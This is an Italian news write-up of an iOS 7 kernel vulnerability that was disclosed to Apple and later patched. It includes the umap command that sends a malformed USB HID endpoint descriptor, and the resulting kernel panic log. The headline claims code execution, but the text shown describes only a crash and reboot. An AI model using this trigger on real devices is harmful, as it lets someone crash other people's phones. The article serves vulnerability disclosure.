Una vulnerabilità in iOS 7 ha consentito l'esecuzione di codice arbitrario in modalità kernel causando il riavvio dell'iPhone, Apple emette una correzione

Quando tutti gli occhi sono puntati sul futuro lancio di iOS 8, un ricercatore di sicurezza ha trovato una vulnerabilità ad alto rischio nel sistema operativo attuale in esecuzione su dispositivi iPhone, iPad e iPod Touch. Secondo il Proof of Concept presentato dal ricercatore di sicurezza Andy Davis, ha scoperto una vulnerabilità in iOS 7 che consente l’esecuzione di codice arbitrario ad alto rischio in modalità kernel. Una volta eseguito questo codice, il kernel del dispositivo iOS va in panico e si riavvia.

• *

Andy ha presentato il proof of concept ad Apple Inc il 26 settembre 2013 e infine il 10 marzo 2014, Apple ha rilasciato una patch per mitigare questa vulnerabilità. L’intero codice è disponibile su Github. Di seguito sono riportati brevi dettagli sull’esecuzione :

Descrizione della vulnerabilità

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Quando un valore specifico è fornito nel descrittore dell’endpoint USB per un dispositivo HID

il kernel del dispositivo Apple va in panico e si riavvia

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Dettagli tecnici

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Il bug può essere attivato utilizzando umap (https://github.com/nccgroup/umap)

come segue:

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Identificatore incidente: F0856C91-7616-4DAC-9907-C504401D9951

Chiave CrashReporter: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

Modello hardware: iPhone3,1

Data/Ora: 2013-09-26 12:35:46.892 +0100

Versione OS: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Messaggio del debugger: panic

Versione OS: 11A465

Versione kernel: Darwin Kernel Version 14.0.0: Mar 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

Versione iBoot: iBoot-1940.1.75

avvio sicuro?: SÌ

Versione Paniclog: 1

Scivolamento kernel: 0x0000000008200000

Base testo kernel: 0x88201000

Tempo Epoch: sec usec

Avvio : 0x52441b69 0x00000000

Sonno : 0x00000000 0x00000000

Risveglio : 0x00000000 0x00000000

Calendario: 0x52441bb5 0x00056497

Compito andato in panico 0x896f8d48: 12856 pagine, 114 thread: pid 0: kernel_task
thread andato in panico: 0x8023de90, backtrace: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Apple ha dato a questa vulnerabilità il numero di riferimento 600217059 e ha rilasciato una patch per mitigare la vulnerabilità che può essere scaricata qui.

• *

*Risorsa : CXSECURITY